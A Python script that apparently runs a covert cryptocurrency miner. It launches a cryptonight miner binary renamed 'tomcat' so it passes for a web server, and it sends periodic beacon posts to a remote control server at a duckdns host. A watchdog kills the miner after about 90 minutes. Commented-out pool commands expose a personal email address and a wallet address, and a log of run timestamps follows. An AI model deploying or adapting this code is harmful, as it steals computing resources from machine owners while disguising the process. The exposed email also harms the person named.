import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:37:01.518538
#2018-02-17 16:22:03.846068
#2018-02-17 18:09:05.005423
#2018-02-17 19:57:01.786892
#2018-02-17 21:45:07.981740
#2018-02-17 23:29:03.939581
#2018-02-18 01:19:03.396731
#2018-02-18 03:06:06.864282
#2018-02-18 04:54:05.440855
#2018-02-18 06:46:07.440537
#2018-02-18 08:34:07.449831
#2018-02-18 10:21:04.841896
#2018-02-18 12:07:04.320507
#2018-02-18 13:52:04.005074
#2018-02-18 15:42:05.658629
#2018-02-18 17:32:03.685412
#2018-02-18 19:18:06.624765
#2018-02-18 21:04:06.354021
#2018-02-18 22:52:06.306417
#2018-02-19 00:40:08.495665
#2018-02-19 02:26:06.284570
#2018-02-19 04:13:05.256785
#2018-02-19 05:57:01.618249
#2018-02-19 07:47:01.883825
#2018-02-19 09:37:04.100273
#2018-02-19 11:26:05.544025
#2018-02-19 13:12:09.354320
#2018-02-19 14:59:09.925485
#2018-02-19 16:48:09.155997
#2018-02-19 18:34:04.567345
#2018-02-19 20:19:04.879335
#2018-02-19 22:07:07.089502
#2018-02-19 23:52:05.198254
#2018-02-20 01:39:06.624402
#2018-02-20 03:27:05.725007
#2018-02-20 05:14:03.851068
#2018-02-20 06:56:05.265886
#2018-02-20 08:43:02.190505
#2018-02-20 10:27:06.981555
#2018-02-20 12:12:07.148122
#2018-02-20 14:00:01.736369
#2018-02-20 15:44:05.321857
#2018-02-20 17:31:01.797218
#2018-02-20 19:19:07.108105
#2018-02-20 21:09:07.484100
#2018-02-20 22:54:07.745974
#2018-02-21 00:38:07.611370
#2018-02-21 02:25:06.773025
#2018-02-21 04:13:07.389082
#2018-02-21 06:01:03.927050
#2018-02-21 07:48:11.649934
#2018-02-21 09:29:01.373966
#2018-02-21 11:18:05.398623
#2018-02-21 13:06:07.153765
#2018-02-21 14:53:08.516423
#2018-02-21 16:43:06.392636
#2018-02-21 18:34:08.054195
#2018-02-21 20:19:07.137501
#2018-02-21 22:08:08.403401
#2018-02-21 23:56:05.549008
#2018-02-22 01:44:08.236598
#2018-02-22 03:32:01.880696
#2018-02-22 05:18:07.549146
#2018-02-22 07:03:05.845791
#2018-02-22 08:49:06.779447
#2018-02-22 10:37:09.084307
#2018-02-22 12:23:06.835789
#2018-02-22 14:08:08.160980
#2018-02-22 15:55:04.126134
#2018-02-22 17:43:06.843416
#2018-02-22 19:30:12.751316
#2018-02-22 21:23:08.571938
#2018-02-22 23:08:05.844693
#2018-02-23 00:54:07.614702
#2018-02-23 02:43:05.045712
#2018-02-23 04:31:07.553942
#2018-02-23 06:17:01.661816
#2018-02-23 08:03:08.169871
#2018-02-23 10:17:08.013797
#2018-02-23 12:11:10.433237
#2018-02-23 13:58:04.941105
#2018-02-23 15:49:01.688208
#2018-02-23 17:34:07.051249
#2018-02-23 19:20:08.084234
#2018-02-23 21:05:06.650811
#2018-02-23 22:50:04.450394
#2018-02-24 00:39:01.880547
#2018-02-24 02:28:07.167123
#2018-02-24 04:19:04.708980
#2018-02-24 06:06:05.284788
#2018-02-24 07:53:07.535910
#2018-02-24 09:38:07.506019
#2018-02-24 11:35:04.738402
#2018-02-24 13:25:09.542773
#2018-02-24 15:14:06.592035
#2018-02-24 17:03:05.478696
#2018-02-24 18:52:07.268391
#2018-02-24 20:41:05.826406
#2018-02-24 22:50:04.380101
#2018-02-25 02:10:08.546998
#2018-02-25 05:36:01.149283
#2018-02-25 11:34:08.062510